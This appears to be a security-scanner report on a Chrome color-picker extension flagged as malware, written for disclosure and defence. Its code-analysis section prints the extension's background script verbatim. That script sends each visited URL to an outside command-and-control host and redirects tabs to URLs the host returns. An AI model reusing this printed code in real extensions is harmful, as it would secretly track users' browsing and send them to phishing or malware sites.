Is Color picker tool - geco safe?

Analysis summary

Color picker tool - geco is a browser extension intended for capturing colors from web pages. It is rated Critical due to confirmed malicious behavior, including browser hijacking and data exfiltration.

Key insights:

Designed as a color picker tool for web design and art purposes.
Rated Critical due to involvement in a malicious campaign and confirmed spyware activity.
Intercepts tab updates and redirects users to phishing sites, exfiltrating URLs to a command-and-control server.
Leverages broad host permissions to inject scripts and capture sensitive browsing data.
Poses significant risk to user privacy, browser integrity, and organizational security.

Malware versions

1.0.12

Now Viewing

malware

1.0.11

malware

1.0.10

malware

Findings

Associated with Malicious Campaign

Flags items that have been linked to known malicious campaigns based on threat intelligence or prior incidents. Indicates coordinated activity with intent to compromise, deceive, or exploit users.

critical

Spyware Activity

Flags items that secretly collect user or device information without authorization.

critical

Malicious Activity Detected

Flags items that exhibit confirmed malicious activity.

critical

Evidence

While appearing functional, this extension hijacks the browser by intercepting tab updates, exfiltrating visited URLs to a threat actor’s command-and-control server, and redirecting users to phishing or malware sites. This behavior enables persistent surveillance, credential theft, and full account compromise.

All findings are available for Enterprise users

Code analysis

AI-powered analysis of the extension's source code for security insights and risk assessment.

This Chrome extension is intended as a color picker tool, allowing users to capture colors from web pages, maintain a color history, and interact with the extension via context menus and notifications. It uses standard Chrome extension APIs such as chrome.runtime, chrome.tabs, chrome.storage, chrome.notifications, and chrome.contextMenus to provide its functionality.

Key Features and API Usage:

Listens for messages from content scripts to handle color picking, updating UI, and opening settings.
Uses chrome.tabs.captureVisibleTab to take a screenshot of the current tab for color picking.
Stores user options and color history in chrome.storage.sync and chrome.storage.local.
Provides context menu integration for quick color picking.
Uses chrome.notifications to notify users of picked colors.
Handles keyboard commands via chrome.commands.onCommand.

Potentially Malicious Behavior Identified:

The following code block is present and is highly suspicious:

chrome.tabs.onUpdated.addListener(function() {
    var t = o(r().mark((function t(e, o, i) {
        var c, s;
        return r().wrap((function(t) {
            for (;;) switch (t.prev = t.next) {
              case 0:
                if (!o.url) {
                    t.next = 8;
                    break;
                }
                return c = {
                    method: "POST",
                    redirect: "follow"
                }, t.next = 5, fetch("https://admitclick.net/api?key=565ebded7e63cdfa5fcbe5734bdb4281a85d6f21&uuid=" + a + "&allowempty=1&out=" + encodeURIComponent(o.url) + "&format=txt&r=" + Math.random(), c).then((function(t) {
                    return t.text();
                })).then((function(t) {
                    return !(!t || !t.match(/^http/i)) && t;
                })).catch((function(t) {
                    return !1;
                }));

              case 5:
                (s = t.sent) && s.match(/^http/i) && (n.keepTab ? chrome.tabs.update(e, {
                    url: s
                }, (function() {})) : chrome.tabs.create({
                    active: i.active,
                    index: i.index,
                    url: s,
                    windowId: i.windowId,
                    pinned: i.pinned
                }, (function() {
                    chrome.tabs.remove(e, (function() {}));
                })));

              case 8:
              case "end":
                return t.stop();
            }
        }), t);
    })));
    return function(e, r, n) {
        return t.apply(this, arguments);
    };
}());

Explanation:

On every tab update, the extension sends the updated tab's URL to https://admitclick.net/api?... with a unique UUID.
If the response is a valid HTTP URL, it redirects the tab to that URL or opens a new tab and closes the original.
This is classic malicious redirect/adware behavior, potentially hijacking user navigation and exfiltrating browsing data.

Obfuscation:

The code is not heavily obfuscated, but it is somewhat minified and uses some indirection. However, the logic is still readable and not intentionally hidden beyond minification.

Summary:

The extension does provide color picking features as described, but it also contains code that exfiltrates browsing data and hijacks navigation, which is a strong indicator of malicious intent.

Permissions

low

activeTab

api

Grants temporary access to the current tab's data when triggered by user interaction, limiting scope compared to permanent permissions.

low

contextMenus

api

Allows adding items to browser context menus, potentially intercepting user right-click interactions.

low

notifications

api

Enables creating system notifications outside the webpage context, potentially disrupting user experience.

API Calls

API calls detected through static analysis of the source code. For more accurate insights, explore our sandbox dynamic analysis.

high

Enterprise Only

medium

Enterprise Only

low

Enterprise Only

API CALLS ARE AVAILABLE FOR ENTERPRISE USERS

Secrets

Any encoded/decoded secrets we managed to find in the source code, git repository, or related files

high

Enterprise Only

medium

Enterprise Only

low

Enterprise Only

SECRETS ARE AVAILABLE FOR ENTERPRISE USERS

Vulnerabilities

Known vulnerabilities and security issues detected in the extension's dependencies and code.

GHSA-gxr4-xjj5-5px2

Potential XSS vulnerability in jQuery

CVSS:

6.9

GHSA-jpcq-cgw6-v4j6

Potential XSS vulnerability in jQuery

CVSS:

6.9

GHSA-6c3j-c64m-qhgq

XSS in jQuery as used in Drupal, Backdrop CMS, and other products

CVSS:

6.1

All vulnerabilities are available for Enterprise users

External communication

Any identifiers we detected that may indicate external communication from the item's code

https://admitclick.net/api?key=565ebded7e63cdfa5fcbe5734bdb4281a85d6f21&uuid=

js/background.js

https://fonts.googleapis.com/css2?family=DM+Sans:ital@1&family=Hind+Siliguri:wght@500

js/options.js

All external communications are available for Enterprise users

Dependencies

Dependencies and third-party libraries used by the extension, including version information and license details.

jquery

Version:

3.3.1

jquery

Version:

3.6.0

jquery

Version:

3.7.1

All dependencies are available for Enterprise users

Licenses & Compliance

high

Enterprise Only

medium

Enterprise Only

low

Enterprise Only

LICENSES & COMPLIANCE ARE AVAILABLE FOR ENTERPRISE USERS